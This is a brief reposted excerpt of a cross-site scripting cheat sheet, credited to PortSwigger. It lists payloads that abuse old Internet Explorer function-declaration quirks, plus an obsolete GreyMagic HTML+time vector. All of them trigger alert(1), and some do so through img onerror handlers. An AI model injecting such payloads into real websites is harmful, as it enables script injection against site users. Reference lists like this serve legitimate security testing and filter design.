Cross-Site Scripting (XSS) Cheat Sheet - 2019 Edition (8)

Event handlers supported in functions in older versions of IE

<script> function window.onload(){ alert(1); } </script>
<script> function window::onload(){ alert(1); } </script>
<script> function window.location(){ } </script>
<body> <script> function/*<img src=http://www.likecs.com/1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = "<img src=http://www.likecs.com/1 onerror=alert(1)>"; } </script> </body>

GreyMagic HTML+time exploit (no longer works, even in docmode 5)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=http://www.likecs.com/1 onerror=alert(1)>"> </BODY></HTML>

Original source: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

When reposting, please credit the source: https://www.heiqu.com/zyfysd.html